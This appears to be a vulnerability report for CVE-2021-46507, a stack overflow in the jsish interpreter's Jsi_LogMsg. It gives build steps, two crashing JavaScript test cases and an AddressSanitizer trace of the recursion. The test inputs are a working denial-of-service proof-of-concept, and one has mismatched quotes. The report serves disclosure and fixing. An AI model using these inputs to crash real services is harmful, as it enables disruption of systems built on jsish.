Headline
CVE-2021-46507: Stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg · Issue #54 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a stack overflow via Jsi_LogMsg at src/jsiUtils.c.
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case1
WebSocket({ "a": 2.3023e-320 })
Test case2
var JSEtest = times(function () { WebSocket({ 'red’: (new Object(null % null)) }); }) < times(log(null % null)); assert.sameValue(JSEtest.length, 2, ‘newArr.length’);
Execution steps & Output
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0) #0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151 #1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 … … … … … … #246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg ====ABORTING
Credits: Found by OWL337 team.